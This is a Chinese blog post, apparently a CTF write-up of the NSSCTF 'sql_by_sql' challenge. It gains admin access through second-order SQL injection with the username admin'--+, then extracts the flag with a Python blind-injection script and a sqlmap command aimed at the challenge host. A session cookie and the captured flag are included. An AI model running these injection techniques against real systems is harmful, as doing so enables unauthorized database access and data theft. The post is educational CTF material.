[NSSRound#1 Basic]sql_by_sql

最新推荐文章于 2024-05-23 20:23:59 发布
最新推荐文章于 2024-05-23 20:23:59 发布
阅读量388 收藏 10
点赞数 4
分类专栏: CTF-web(零散wp合集) 文章标签: sql 数据库 Web安全 网络安全 CTF SQL注入 NSSCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jayjay___/article/details/138624702
版权

[NSSRound#1 Basic]sql_by_sql

这题没啥难的,二次注入+盲注的套题

先注册,进去有个修改密码
可能是二次注入

image-20240506005829603

修改密码处源码

<!-- update user set password='%s' where username='%s'; -->

重新注册一个admin'--+
获得admin身份(原理看sqli-labs,20多关来着:【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析_sqlilabs靶场1–65过关-CSDN博客

image-20240506010418482

image-20240506010437849

在/query下盲注查询

import requests
import string

str = string.ascii_letters + string.digits

url = "http://node4.anna.nssctf.cn:28926/query"
s = requests.session()
headers = {'Cookie': 'session=eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.ZjfMvg.GIZuH3fe_fhe_TTllzNnIvaVWpo'}

if __name__ == "__main__":
    name = ''
    for i in range(0,100):
        char = ''
        for j in str:
            #表+字段
            #payload = "1 and substr((select sql from sqlite_master limit 1,1),{},1)='{}'".format(i, j)
            #数据
            payload = "1 and substr((select flag from flag limit 0,1),{},1)='{}'".format(i, j)
            data = {"id": payload}
            r = s.post(url=url, data=data, headers=headers)
            #print(r.text)
            if "exist" in r.text:
                name += j
                print (j, end='')
                char = j
                break
        if char == '%':
            break

image-20240506022554209

NSSCTF{cdec206d-5ddb-4ea1-ac9a-292429de2911}

sqlmap打法:

python sqlmap.py -u "http://node4.anna.nssctf.cn:28926/query" --data="id=1" --cookie="eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.ZjfMvg.GIZuH3fe_fhe_TTllzNnIvaVWpo"
Jay 17
关注
  • 4
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
MySQL_Data1211758222002.zip_SQL_Server_Visual_Basic_
08-12
MSQL Connection data programing with visual basic
SQL.rar_joints sql
09-19
basic commands and joints and functions
f.rar_SQL_Server_Visual_Basic_
08-11
基于.net的电力工程的日负荷计算,应用环境VS和SQL SERVER
DB2XML.zip_SQL_Server_Visual_Basic_
08-11
工具类来映射一个SQL Server或访问数据库模式到xml包括表、列、键和约束。GetOleDbSchema函数用来获取DB细节和xml输出使简单的XSL转换为HTML、文本等。项目包括测试形式展示用途。
Market_Invoicing_System.zip_SQL_Server_Visual_Basic_
08-11
一个SQL数据库的使用例子,比较完整的会员制商场进销存系统源码
ejemploDatosSQLVB.zip_SQL_Server_Visual_Basic_
08-11
examples of sql for sdk in vb
BackupRestoreVBnet.rar_SQL_Server_Visual_Basic_
08-12
backup and restore Sql Server
TestSQL.rar_SQL_Server_Visual_Basic_
08-12
VB.net 向数据库中添加删除更新本地文件
AnbarPro_sqlserver_visualbasic_ado.net_
09-29
Store &amp; Store Software
BasicExcel_src1.5_basicexcel_
10-03
根据之前前辈的1.4版本进行升级,为了能在VS2019中能否编译通过及正确读取数据
VB6_SQL.rar_VB6 SQL_vb6
09-23
Visual Basic 6编写的利用SQL语句操作数据库的例子。文件名是VB6_SQL.RAR.
Spring AOP
最新发布
zyh20050430的博客
05-23 463
AOP是一种思想,它的实现方式有很多,Spring AOP 就是其中的一种,还有Aspectj,CGLIB等。我们学过的拦截器,其实是在URL的维度上实现的AOP(也就是一次请求和响应)。但实际上,AOP的作用维度比这更细,可以根据包,类,参数,方法等进行拦截,从而实现更加复杂度业务。
sql去除表中某个字段的空格
HelloWorld的专栏
05-20 165
比如表中名字字段,名字之间有空格,需要把空格去除,应该如何写SQL语句实现?函数来去除字符串两端的空格,如果需要去除字段中的所有空格,可以使用。以下是一个示例,假设我们有一个名为。的表,并且我们想要去除。在SQL中,可以使用。
DQL( 数据查询语言)
xiaotiaoza的博客
05-21 221
逻辑查询 not>and>or and:遇假则假 or:遇真则真 not:取反。select 字段,字段2,…from 表名 where 筛选条件;select * from 表名 where 筛选条件;is null 为空 is not null 不为空。select 字段,字段2,…需要把%或者_这个通配符转义称为普通的字符串。%:代表这个位置有0个或者无数个字符;select * from 表名;_:代表这个位置只有1个字符;
byzer sql 详细参考
gaohongfeng1的博客
05-20 223
数据加载 load excel load excel.`tmp/upload/exceltest.xls` where header="true" as hello_world; load csv load csv.`tmp/upload/taxi_tour_table_train_simple.csv` where delimiter="," and header = "true" as taxi_tour_table_train_simple;
写SQL的心得
weixin_64842400的博客
05-11 729
接着,系统按照 GROUP BY 子句中的指定字段分组,并对每个分组进行计算,生成虚拟的分组结果表。执行顺序 :from > on > where > group by > having > select > distinct > order by > top。4、聚合函数本质:对指定的列进行聚合,如果我们用了group by,我们可以对每个分组应用内聚合函数。在分组内部,聚合函数会自动处理所有重复的行。具体来说,在执行 SELECT 子句时,系统先计算 SELECT 中的列表达式和函数等,然后。
公用表表达式(CTE)详解:针对 MySQL 和 SQL Server 数据库
nbsaas-boot基于Request-Response的企业级快速开发框架
05-21 1078
CTE 是一个命名的临时结果集,它在查询的执行范围内有效。CTE 的定义在WITH子句中,紧随其后的是查询主体。非递归 CTE:用于定义一次性计算结果的临时表。递归 CTE:用于处理递归查询,如处理层次结构数据(例如组织结构图)。
SQL 中 HAVING 与 WHERE 的关系详解
良月柒
05-20 783
WHERE 子句用于在 SQL 查询中过滤记录,它在 SELECT、UPDATE、DELETE 等语句中使用,用于指定返回或操作的数据条件。WHERE 子句直接作用于表中的行数据。示例在此示例中,WHERE 子句过滤出部门为 "Sales" 的员工记录。理解和合理使用 WHERE 和 HAVING 子句对于编写高效的 SQL 查询至关重要。WHERE 子句用于在分组之前过滤数据,而 HAVING 子句用于在分组之后过滤聚合结果。
CentOS7.9使用yum安装PostgreSQL
qq_33906471的博客
05-17 319
本文是以CentOS7.9.2009版本的操作系统为基础使用yum部署的9.2.24版本的PostgreSQL。
basicexcel_src.zip
08-09
basicexcel_src.zip是一个文件压缩包,它包含了BasicExcel的源代码。BasicExcel是一个用于读写和操作Excel文件的开源C++库。通过分析源代码,可以更好地理解BasicExcel的工作原理和功能。在basicexcel_src.zip中,可能会包含头文件、源文件以及其他必要的文件,用于编译和构建BasicExcel库。 通过研究basicexcel_src.zip中的源代码,开发人员可以了解BasicExcel是如何实现Excel文件的读写和操作的。例如,可以找到处理Excel文件的函数和类的定义,了解它们的功能和用法。代码中可能还包含了一些示例用法或说明,用于帮助开发人员更好地使用BasicExcel库。 通过使用BasicExcel,开发人员可以在自己的项目中方便地实现对Excel文件的读写和操作。这对于需要处理大量数据、生成报表或导入导出Excel数据的应用程序非常有用。BasicExcel库提供了丰富的功能,包括创建新的Excel文件、读取和修改现有的Excel文件、处理单元格数据、设置格式和样式、合并拆分单元格等。 总之,basicexcel_src.zip是一个包含BasicExcel源代码的文件压缩包。通过研究这些源代码,开发人员可以深入了解BasicExcel库的工作原理和功能,并将其应用于自己的项目中,以实现对Excel文件的读写和操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Jay 17

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值